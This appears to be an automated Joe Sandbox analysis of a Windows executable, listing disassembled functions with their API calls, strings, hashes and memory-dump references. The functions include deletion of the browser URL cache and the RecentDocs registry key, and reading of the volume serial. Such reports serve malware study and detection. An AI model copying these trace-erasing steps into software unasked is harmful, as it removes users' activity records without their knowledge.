API ID: CreateDirectoryFolderInstancePathProxyRelease_SpecialUnknown_Windows
String ID: \History
API String ID: 3119684454-314617673
Opcode ID: 3390bc1eba11084a4cc8e2fd908aad4860485e771c45de15bcf9dbbf2a06d188
Instruction ID: 900f256215fbccf07109669abd3ee6d43b988d0dfea6ae5773aeef7301ea0bc3
Opcode Fuzzy Hash: 3390bc1eba11084a4cc8e2fd908aad4860485e771c45de15bcf9dbbf2a06d188
Instruction Fuzzy Hash: 03216274204741ABD710DF54DC45FAAB7A9EB85B00F00496EF5849B2C0D7B49845CFAA

Function 0042BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF

Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E

CoInitializeEx.COMBASE ref: 0042BAFA
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0042BB26

Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6

Strings

Security initialization failed, xrefs: 0042BB36
COM initialization failed, xrefs: 0042BB08

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Initialize$CallbackDispatcherItemMessageSecurityUser
String ID: COM initialization failed$Security initialization failed
API String ID: 2763255498-2019830807
Opcode ID: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
Instruction ID: f88cc46181f4dfbc0f249d786d5360bfa143289b16b194d71d3c30d2b60c04a5
Opcode Fuzzy Hash: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
Instruction Fuzzy Hash: A001AD303D8B107AFA623632BD27F5C11856B50F26F60002FF606AE2D2DFDC6945828E

Function 00401220 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00401237
FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 0040124F
DeleteUrlCacheEntry.WININET(?), ref: 00401287
FindNextUrlCacheEntryA.WININET ref: 0040129D
FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 004012BB

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CacheEntry$Find$FirstNext$Delete
String ID:
API String ID: 3251259003-0
Opcode ID: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
Instruction ID: 988728bd11fdbca91c0b550d98239d6b5543920a559e34b5b42614616c157492
Opcode Fuzzy Hash: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
Instruction Fuzzy Hash: 3A11C3B2505305AFD220EF959C84E6BB3DC9F98354F04482EF945A2291D778DC088BAA

Function 0042CE40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,00000018,?,?,?), ref: 0042CE96

Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1

Strings

%04X-%04X, xrefs: 0042CEE5
disk error!, xrefs: 0042CEA2
C:\, xrefs: 0042CE6F

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: H_prologInformationVolume
String ID: %04X-%04X$C:\$disk error!
API String ID: 1258155637-399326531
Opcode ID: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
Instruction ID: cae5146e5efa9b00dd1fefc34af0bd2d153fb86159491f6109f916f967ad882e
Opcode Fuzzy Hash: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
Instruction Fuzzy Hash: 8B31AD71204741AFC304DB68C845F5FBBA4AB85714F408A1EF1A6872D1DBB89509CB9A

Function 0045FB8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0045FBB1
PathFindExtensionA.SHLWAPI(?), ref: 0045FBC8
lstrcpyA.KERNEL32(00000000,?), ref: 0045FBF2

Part of subcall function 0045F8A9: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D

Strings

%s.dll, xrefs: 0045FBCE

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
String ID: %s.dll
API String ID: 4178508759-3668843792
Opcode ID: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
Instruction ID: cc2ed34eadf9b4ba29d8b30092525c1cfbb258b8e0cff2dfd049ffe264f0ed61
Opcode Fuzzy Hash: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
Instruction Fuzzy Hash: D60188B1D0010CABCB15EFA5DC959EE77BDFB48305F0405BAEE06D3101E6B49A4D8B55

Function 0043CC40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

IsWindow.USER32(000103F6), ref: 0043CC46
LoadCursorA.USER32(00000000,00007F00), ref: 0043CC76

Part of subcall function 00456E8B: GetClassInfoA.USER32(?,-0000007C,?), ref: 00456EEA

SetWindowLongA.USER32(000103F6,000000FC,0043C820), ref: 0043CCA2

Strings

(sM, xrefs: 0043CC8A

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Window$ClassCursorInfoLoadLong
String ID: (sM
API String ID: 2858387636-3311458642
Opcode ID: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
Instruction ID: ef079a07a27ee7e5d70a19a55713efbde82861f97534fe9ab6d3067533c054b6
Opcode Fuzzy Hash: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
Instruction Fuzzy Hash: C3F05E70389310BBE31467A0AC5AF1A22199B44B45F20513FFF06BA2E5EAA86800C79D

Function 0045FA85 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,004D5904,00000000,00000001,?), ref: 0045FAC8
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0045FAE8
RegCloseKey.ADVAPI32(?), ref: 0045FB2C
RegCloseKey.ADVAPI32(00000000), ref: 0045FB42

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
Instruction ID: ef4cf7c31f733ac53fc8ca2d79e85ee5050cdb63d3cced5bf84dc23dad16bdee
Opcode Fuzzy Hash: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
Instruction Fuzzy Hash: A8216DB1D00208EFDB21CF85D855AAEFBB8EF90315F1040BBE905A6211D3746A08CF66

Function 00455C79 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455C9F
LoadResource.KERNEL32(?,00000000), ref: 00455CA7
LockResource.KERNEL32(00000000), ref: 00455CB9
FreeResource.KERNEL32(00000000), ref: 00455D03

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
Instruction ID: a5e2a00811957388d8ef0ec10edfa5231714503df0fa2ad57628587c981f475f
Opcode Fuzzy Hash: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
Instruction Fuzzy Hash: 7B11913A500F05EFC7219F64D958AABB7B4FF04756F00802AEC4253751E3B8AC48DB54

Function 0045D956 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0045D96B
GetWindowTextA.USER32(?,?,00000100), ref: 0045D987
lstrcmpA.KERNEL32(?,?), ref: 0045D99B
SetWindowTextA.USER32(?,?), ref: 0045D9AB

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
Instruction ID: bcf724bac57874a173b33d79688deb67c16571129e900e4812eadd9e8c43e4f8
Opcode Fuzzy Hash: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
Instruction Fuzzy Hash: DAF01DB5901118ABDF21AF64DD489CE7B79EF08355F0040A2FD45E6220E774CA94DB9A

Function 0043CDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0043CE22
CreateFontIndirectA.GDI32(?), ref: 0043CE38

Strings

xsM, xrefs: 0043CE3F

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CreateFontIndirectInfoParametersSystem
String ID: xsM
API String ID: 3898911155-2849830882
Opcode ID: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
Instruction ID: f5a41c1656a517e53d87a5575b5162294697ca63d823790e3c27869578f867cc
Opcode Fuzzy Hash: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
Instruction Fuzzy Hash: 9E215C71504780DFD325DF29D8057DABBE8FF88714F008A2FE48A87251DBB89404CB56

Function 00405630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674

Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs, xrefs: 0040566A

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: DeleteFileFindFirstFolderPathSpecial
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
API String ID: 1374875820-3036595939
Opcode ID: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
Instruction ID: 659d51f54426914620f0ef7ac8131a6f5e17d26cd5e287e3669eafa29438ce9a
Opcode Fuzzy Hash: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
Instruction Fuzzy Hash: 2FF03035244700AEE324A7109C06FEA7794AB54B10F44442DF985AA2C0EEF99484CB9B

Function 0045B192 Relevance: 4.6, APIs: 3, Instructions: 132filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0000B042), ref: 0045B1C6

Part of subcall function 0045B051: __EH_prolog.LIBCMT ref: 0045B056
Part of subcall function 0045B051: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
Part of subcall function 0045B051: lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091

CreateFileA.KERNEL32(0000B042,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,0000B042), ref: 0045B2DB
GetLastError.KERNEL32 ref: 0045B2ED

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
String ID:
API String ID: 4207171074-0
Opcode ID: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
Instruction ID: bc931f4a3eb57f992eb954223cc438830c3bf033075d61ebac5b1b5f474afd53
Opcode Fuzzy Hash: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
Instruction Fuzzy Hash: F0413331600608ABEB108F25CC8A7EEB764EB04315F10C56BFD16D62D1CB7CC9898BA8

Function 004021B0 Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA

Part of subcall function 00401180: LoadResource.KERNEL32(00000104,?,?,00000000,0040120C,?,00000000,?,?,00000006,00000000,?,0045A3DC,?,?,?), ref: 0040118C

WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402207
WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402245

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ByteCharMultiResourceWide$FindLoad
String ID:
API String ID: 861045882-0
Opcode ID: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
Instruction ID: 4a0254a43c1e3588e48c1e462ee64abe08c7cd62e9e1b92a79ad5815ace06fc1
Opcode Fuzzy Hash: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
Instruction Fuzzy Hash: 9B21D4323016106FD7109B69DC8DF2B77ACEB49B55F10406EF541EB2D0DAB8A801C7A5

Function 0045B632 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000030,00000000,00000000,00000000), ref: 0045B600
TranslateMessage.USER32(00000030), ref: 0045B61F
DispatchMessageA.USER32(00000030), ref: 0045B626

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Message$CallbackDispatchDispatcherTranslateUser
String ID:
API String ID: 2960505505-0
Opcode ID: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
Instruction ID: 06f4cbef7ab207f2fff16cb34858fb85fe973bf41392bcce92dd4f4ecb0072a7
Opcode Fuzzy Hash: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
Instruction Fuzzy Hash: 93F05E71211851AFA7156B319C089BF76ACEF0135BB05406BF801C6212EB68CD468AEF

Function 0045613C Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000005), ref: 00456168
LoadResource.KERNEL32(?,00000000), ref: 00456170
FreeResource.KERNEL32(00000000), ref: 00456188

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Resource$FindFreeLoad
String ID:
API String ID: 934874419-0
Opcode ID: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
Instruction ID: fccebd9682a858cdeb5031e85e51eaab4cad9e1c6797173475c662a524fb5943
Opcode Fuzzy Hash: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
Instruction Fuzzy Hash: 0AF05471601B11ABC7105B659C88EABFB9CFF59366F45002AF944C3312D77898048AA9

Function 0042EFA0 Relevance: 3.1, APIs: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042EFD4
SendMessageA.USER32(?,00000143,00000000,?), ref: 0042F03E

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
